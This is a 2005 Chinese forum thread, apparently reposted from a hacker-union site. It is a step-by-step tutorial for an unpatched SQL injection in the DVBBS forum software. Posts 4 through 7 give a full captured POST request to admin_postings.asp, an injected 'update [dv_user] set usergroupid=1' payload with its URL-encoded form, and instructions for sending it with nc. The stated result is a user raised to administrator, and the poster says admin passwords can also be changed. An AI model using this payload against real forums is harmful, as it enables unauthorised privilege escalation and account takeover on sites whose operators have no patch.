收藏文章 楼主
动网BBS最新高危漏洞
网友【血蜘蛛】 2005-06-21 21:33:20 分享在【时代发展的印记】版块    9    1

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片
动网BBS系统的新漏洞,动网官方论坛到现在都还没出补丁。是刚发现的!那我们要首先找一个没有固顶帖子的版面,自己找找去。一个论坛总不可能哪个版块都有固顶吧?呵呵``点进去看看有没有固定帖子什么的,我是自己架设的平台做测试的。当然要“符合”漏洞条件了。以前台管理员的身份登陆,也不一定要用前台管理员进去,一个斑竹就行,能固顶帖子就行了,然后随便发个帖子。然后点下设置固顶如图1
meiguo.com 发布人签名/座右铭·有时你看似是一件很吃亏的事,往往会变成非常有得的事。
·凡事都留有余地,因为人是人,不是神,不免有错处,可以原谅人的地方,就原谅人。
·好的时候不要看得太好,坏的时候不要看的太坏。
大家都在看
回复/评论列表
默认   热门   正序   倒序
血蜘蛛
2F
血蜘蛛 Lv0
按正常的方式固顶,如图2
 0   2005-06-21 21:33:55  回复
血蜘蛛
3F
血蜘蛛 Lv0
到这里我们先暂停,打开WSE抓包工具准备抓取提交的post信息,打开了之后点下确认*作。现在看看WSE抓到些什么东西了,如图3
 0   2005-06-21 21:34:37  回复
血蜘蛛
4F
血蜘蛛 Lv0
截取到了post提交信息,复制下来,内容如下:

POST /sql/admin_postings.asp?action=istop HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://192.168.1.254/sql/admin_postings.asp?action=istop

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler ; .NET CLR 1.1.4322)

Host: 192.168.1.254

Content-Length: 133

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: 192%2E168%2E1%2E254%2Fsql%2F=UserID=1&usercookies=0&password=9pb621664s5w7IL7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL; ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; Dvbbs=; upNum=0

istopaction=1&boardID=1&ID=1&title=&content=a&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成250吧。修改完之后就用NC提交,如图4
 0   2005-06-21 21:35:16  回复
血蜘蛛
5F
血蜘蛛 Lv0
意思是将a.txt的内容用nc提交上去然后将返回的信息保存在1.htm里面.

接着打开我们输出的1.htm看看,如图5
 0   2005-06-21 21:35:38  回复
血蜘蛛
6F
血蜘蛛 Lv0
语法错误?知道是为什么吗?前面我说过了,Content-Length的长度我没数,语句只执行到1,1);update [dv_user] set usergroupid=1 where user这里,语句都没执行完,能正确吗?不过不要紧,我们把长度多加几个数就改成278吧然后再次提交,然后查看1.htm的输出结果,如图6
 0   2005-06-21 21:36:17  回复
血蜘蛛
7F
血蜘蛛 Lv0
看到没有?*作成功。成功执行了我们的注入语句。我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:619054,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,如图7
 0   2005-06-21 21:36:56  回复
血蜘蛛
8F
血蜘蛛 Lv0
呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的!~``汗```Pizzaviat

文章来源于红客联盟:

http://forum.chinahonker.com/index.php?...e=end&tid=59904
 0   2005-06-21 21:37:59  回复
蝶舞门人
9F
太强,不能不顶----
 0   2005-09-15 10:13:41  回复
meiguo.com 创始人

emotion

1   2005-06-21 21:33:20  回复

回复/评论:动网BBS最新高危漏洞

暂无用户组 升级
退出
等级:0级
美果:
美过
精华推荐
  1. 川普总统宣布“金卡计划”网站开放
  2. 中国政府在构筑战略资源防线,重拳打击稀土走私!
  3. “外星来客”以每小时21.6万公里的速度向地球飞来
  4. 宗庆后家族的多处海外房产曝光,价值数亿元!
  5. 英伟达的市值突破了四万亿美元,创人类历史纪录!
  6. 川普政府打算“发钱啦”
  7. 中国🇨🇳开始质疑英伟达芯片“存后门”
  8. “全球最强护照”排行榜又更新了(2025版)
  9. 马斯克打算组建新党“美国党”代表中间派
  10. 难怪马斯克公开认错… 川普总统的相关杀器可以更多?
  11. 苹果投资了6000亿美元,加速“美国制造”计划!
  12. 比尔盖茨的财富突然蒸发了510亿美元,真相却令人肃然起敬!
  13. 美国新法案“大漂亮”引发了全球资本配置大调整
  14. 在美国可以感受欧洲风情的五座小镇
  15. 遥控器电池,被幼儿误吞… 欧系保险公司赔付了近1.4亿元人民币!
  16. 川普政府的对华政策突然改变了?
  17. 广西防城港“奔驰女司机事件”引发全网热议
  18. 川普总统声称希望中国“增加美油采购”
  19. 移民并非背叛,是一种勇敢的人生轨迹选择!
  20. 孩子沉迷手机的真相和破局之道
  21. 美国移民新机遇:紧缺人才的绿卡通道“无需排期”
  22. 川普政府在力推药价改革和数字医疗系统
  23. QQ等级256级用户诞生,首次解锁“时光企鹅”图标!
  24. 萝莉岛是美国的政治中心?马斯克并非不懂政治,而是太懂了!
  25. 美国再次宣布退出联合国教科文组织
  26. 突然“失去住持”的少林寺情况如何了?
  27. 麻省理工学院发布AI学习平台“MIT Learn”
  28. 韦伯望远镜(JWST)发布迄今为止最大的早期宇宙地图
  29. 川普总统签署了“对等关税令” 引发全球震荡
  30. 中美连谈5小时,川普总统公开感叹“中国太强硬”… 英伟达在加紧扩大芯片出口量
  31. 美国国会通过了减税法案,马斯克和川普总统再次激烈交锋!
  32. 川普总统批评支持者,马斯克激烈回应!
  33. 健身网红在飞机上的着装引争议
  34. 中美经贸谈判重启,瑞典磋商和商界代表团访华“双管齐下”
  35. 川普政府计划改革移民签证制度和入籍考试
  36. 核聚变技术或将成为黄金价格的颠覆者

美国动态 美果搜索

Your IP: 216.73.216.150, 2025-08-12 00:52:34

Processed in 0.6589 second(s)

头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息
已有0次打赏
(1) 分享
分享
取消